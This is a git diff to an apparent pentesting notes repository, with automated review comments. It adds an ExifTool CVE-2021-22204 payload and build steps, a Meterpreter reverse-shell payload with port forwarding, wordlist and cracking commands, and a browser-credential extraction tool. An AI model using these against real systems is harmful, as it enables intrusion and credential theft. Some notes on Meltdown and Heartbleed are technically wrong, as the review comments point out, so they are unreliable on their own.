diff --git a/.gitmodules b/.gitmodules index 1981ec3..c2daf29 100644 --- a/.gitmodules +++ b/.gitmodules @@ -70,3 +70,6 @@ [submodule "exploit/web/content_security_policy/JSONBee"] path = exploit/web/content_security_policy/JSONBee url = https://github.com/zigoo0/JSONBee.git +[submodule "post_exploitation/firefox_decrypt"] + path = post_exploitation/firefox_decrypt + url = https://github.com/unode/firefox_decrypt.git diff --git a/enumeration/docs/wfuzz.md b/enumeration/docs/wfuzz.md new file mode 100644 index 0000000..e60f9c3 --- /dev/null +++ b/enumeration/docs/wfuzz.md @@ -0,0 +1,6 @@ +# Wfuzz + +* Fuzz parameters +```sh +wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http:///api/items\?FUZZ\=test +``` diff --git a/exploit/CPUs/meltdown.md b/exploit/CPUs/meltdown.md new file mode 100644 index 0000000..931630c --- /dev/null +++ b/exploit/CPUs/meltdown.md @@ -0,0 +1,26 @@ +# Meltdown + +* [PoC from IAIK](https://github.com/IAIK/meltdown.git) +![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown") + +* Each page table entries has the following flag values + * SUP (user or kernel mode) + * READ + * WRITE + +* Flags are checked by the MMU + +* Pipelined steps of an instruction are the following + * Fetch + * Decode + * Execute + * Memory access + * Register write back + +* A pipeline can execute one of each steps concurrently every clock cycle. +* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls. +* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline. + * If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end. + +* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown. + 
diff --git a/exploit/linux/exiftool.md b/exploit/linux/exiftool.md new file mode 100644 index 0000000..ab274bf --- /dev/null +++ b/exploit/linux/exiftool.md @@ -0,0 +1,12 @@ +# CVE-2021-22204 + +* Craft an a payload and execute it via exiftool +* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/) + +## Usage +* Payload is `(metadata "\c${system('id')};")` +```sh +sudo apt install djvulibre-bin +bzz payload payload.bzz +djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz +``` diff --git a/exploit/ssl_tls/heartbleed.md b/exploit/ssl_tls/heartbleed.md new file mode 100644 index 0000000..23cded6 --- /dev/null +++ b/exploit/ssl_tls/heartbleed.md @@ -0,0 +1,8 @@ +# Heartbleed + +* SSL V1.0.1 and V1.0.1f +* Client sends msg, msglength +* If msg is 0 and the msglength is longer, return from server is arbitrary memory content + +* [Heartbleed](https://heartbleed.com) + diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool index c765a2e..eb411ea 160000 --- a/exploit/web/jwt/jwt_tool +++ b/exploit/web/jwt/jwt_tool @@ -1 +1 @@ -Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da +Subproject commit eb411ea89b11df4485733201860619883a4f05e6 diff --git a/exploit/web/jwt_header b/exploit/web/jwt_header deleted file mode 100644 index 2b81565..0000000 --- a/exploit/web/jwt_header +++ /dev/null @@ -1 +0,0 @@ -{"typ": "JWT", "alg": "HS256"} diff --git a/exploit/web/xss.md b/exploit/web/xss.md index c84a8ad..951611f 100644 --- a/exploit/web/xss.md +++ b/exploit/web/xss.md @@ -123,6 +123,7 @@ document.onkeypress = function (e) { ``` ## Tricks and Tips * Use Polyglots +* [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) ## Protection Methods 
@@ -133,3 +134,5 @@ There are many ways to prevent XSS, here are the 3 ways to keep cross-site scrip 2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place. 3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity < + + diff --git a/hashes/generate_wordlists.md b/hashes/generate_wordlists.md index cd277ef..3d5fc8e 100644 --- a/hashes/generate_wordlists.md +++ b/hashes/generate_wordlists.md @@ -1,10 +1,34 @@ # Generate Wordlists +* [username_generator](https://github.com/therodri2/username_generator.git) * [CeWL](../enumeration/CeWL/README.md) * [Mentalist](https://github.com/sc0tfree/mentalist.git) * [lyricpass](https://github.com/initstring/lyricpass.git) * [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git) + +## Cupp + +* [cupp](https://github.com/Mebus/cupp.git) + * Interactive dialogue via `cupp.py -i` + * Wordlistdownload via `cupp.py -l` + * Connections to alecto DB via `-a` + +## crunch + +```sh +crunch -o +``` + +* Option `-t` specifies variable characters + * `@`, lower case alpha characters + * `,`, upper case alpha characters + * `%`, numeric characters + * `^`, special characters including space +```sh +crunch 8 8 -t passw%%rd +``` + ## ttpassgen * [ttpassgen](https://github.com/tp7309/TTPassGen.git) * Generate lists from the ground up diff --git a/hashes/password_cracking/john.md b/hashes/password_cracking/john.md index 5bda3f0..936f7f4 100644 --- a/hashes/password_cracking/john.md +++ b/hashes/password_cracking/john.md 
@@ -31,3 +31,7 @@ $[0-9]$[0-9] ### Existing Rules * `l33t`, l33tsp34k * `NT`, case mutation +* Example for `best64` +```sh +john --wordlist=single_password.txt --rules=best64 --stdout > out.txt +``` diff --git a/hashes/password_guessing/standard_passwords.md b/hashes/password_guessing/standard_passwords.md new file mode 100644 index 0000000..92a116b --- /dev/null +++ b/hashes/password_guessing/standard_passwords.md @@ -0,0 +1,9 @@ +# Initial Passwords + +* Services and products sometimes have credentials set initially. + +* [default-password](https://default-password.info) +* [datarecovery](https://datarecovery.com/rd/default-passwords/) + + + diff --git a/pentesting.md b/pentesting.md index f37e0ee..a252e19 100644 --- a/pentesting.md +++ b/pentesting.md @@ -56,3 +56,14 @@ Authorized audit of security systems of computers and networks. * [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf) * [NIST](https://www.nist.gov/cyberframework) * [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance) + +## Testing Webapps + +* Two methods +1. Every Page and its functions one by one +2. Test by stages + * Authorization + * Authentication + * Injection + * Client Side Controls + * Application Logic diff --git a/pivoting.md b/pivoting.md index b7fa757..1cb613e 100644 --- a/pivoting.md +++ b/pivoting.md @@ -144,3 +144,8 @@ sshuttle -r @ --ssh-cmd "ssh -i " ``` * Exclude servers via `-x`, for example the target/gateway server +### Meterpreter +* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and +```sh +portfwd add -l 22 -p 22 -r 127.0.0.1 +``` diff --git a/post_exploitation/firefox_decrypt b/post_exploitation/firefox_decrypt new file mode 160000 index 0000000..b71a030 --- /dev/null +++ b/post_exploitation/firefox_decrypt @@ -0,0 +1 @@ +Subproject commit b71a030ae8c2c5253716243a1a9375bd36074be8 diff --git a/post_exploitation/priv_esc/docs/pspy.md b/post_exploitation/priv_esc/docs/pspy.md new file mode 100644 index 0000000..1e532b4 
--- /dev/null +++ b/post_exploitation/priv_esc/docs/pspy.md @@ -0,0 +1,5 @@ +# pspy + +* Snoop processes withou root permissions +* [Repo](https://github.com/DominicBreuker/pspy.git) + diff --git a/xor_key_file.py b/xor_key_file.py new file mode 100644 index 0000000..c79d223 --- /dev/null +++ b/xor_key_file.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +def xor(data, key): + keylen = len(key) + return bytearray(( + (data[i] ^ key[i % keylen]) for i in range(0,len(data)) + )) + + +if __name__ == "__main__": + data = bytearray(open('topsecret.txt', 'rb').read()) + key = b'key' + res = xor(data, key) + print(res.decode()) +
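Review bot: the URL in the new wfuzz line, `http:///api/items\?FUZZ\=test`, has an empty host, so the command fails as written; replace it with an explicit placeholder such as `http://<target>/api/items?FUZZ=test`. The `--hh 45` filter is also target-specific (it hides responses whose body is 45 characters long, i.e. the baseline "unknown parameter" reply), so a one-line comment saying how that value was obtained would make the example reusable.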
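Review bot: several statements in the new meltdown.md are garbled or technically wrong. "Each page table entries has" should read "Each page table entry has", and "because the is no assurance" should be "because there is no assurance". More importantly, "kernel memory may be executed" should say "kernel memory may be read": Meltdown leaks data through a transiently executed load whose result is observed via the cache, it does not execute kernel code. The reordering of instructions while one stalls is done by the CPU's out-of-order execution engine, not by the MMU, which only performs address translation and the flag checks described two bullets earlier. Finally, the overview figure is linked from an image-paste host (gcdn.pbrd.co) that is likely to expire; commit the image to the repository instead.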
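Review bot: typo in the first bullet of exiftool.md, "Craft an a payload" should be "Craft a payload". The Usage section quotes the payload string but never shows it being written to the `payload` file that `bzz payload payload.bzz` reads, so the three commands cannot be followed as given; add that step. The page also does not record which ExifTool versions are affected, which is the first thing a reader needs in order to tell whether an installation is patched; take the range from the linked article and note it next to the CVE heading.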
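Review bot: the first bullet of heartbleed.md, "SSL V1.0.1 and V1.0.1f", misnames both the software and the range: Heartbleed is an OpenSSL bug affecting versions 1.0.1 through 1.0.1f (fixed in 1.0.1g), not a flaw in SSL/TLS itself. The third bullet should also state the actual defect: the server trusts the client-supplied heartbeat payload length and copies that many bytes out of its own memory without checking it against the size of the payload that actually arrived, which is why the reply contains arbitrary process memory.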
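Review bot: the two empty lines appended at the end of xss.md carry no content and are trailing whitespace; drop them from the change.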
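Review bot: the first crunch block in generate_wordlists.md, `crunch -o`, is not a valid invocation: crunch requires minimum and maximum length arguments and `-o` takes an output filename, e.g. `crunch 8 8 -o wordlist.txt`. The second example, `crunch 8 8 -t passw%%rd`, also fails because crunch requires the min and max lengths to equal the pattern length, and `passw%%rd` is 9 characters; it should be `crunch 9 9 -t passw%%rd`. In the Cupp section, "Wordlistdownload" should be "Wordlist download".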
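Review bot: the three blank lines at the end of the new standard_passwords.md are trailing whitespace; drop them. The first bullet would read more clearly as "Services and products often ship with vendor-default credentials", which is the point the two linked databases serve.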
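Review bot: the Meterpreter bullet in pivoting.md ends in a dangling "and" before the code block; finish the sentence and say what the `portfwd add -l 22 -p 22 -r 127.0.0.1` line does (bind local port 22 and relay it to port 22 on the loopback interface of the host running the Meterpreter session), since `-r 127.0.0.1` is easy to misread as the operator's own loopback.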
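Review bot: typo in pspy.md, "withou" should be "without".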
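Review bot: the shebang `#!/usr/bin/env python` in xor_key_file.py is ambiguous, and under Python 2 the script breaks: indexing the `bytes` key yields one-character strings, so `data[i] ^ key[i % keylen]` raises TypeError; use `#!/usr/bin/env python3`. The file is opened without a `with` block (the handle is never closed), the input path `topsecret.txt` and the key are hard-coded rather than taken from `sys.argv`, and `res.decode()` raises UnicodeDecodeError whenever the XOR output is not valid UTF-8, which is the common case for binary input; write the raw bytes with `sys.stdout.buffer.write(res)` instead. The `xor` function itself is correct, though `bytearray(d ^ k for d, k in zip(data, itertools.cycle(key)))` is the idiomatic form.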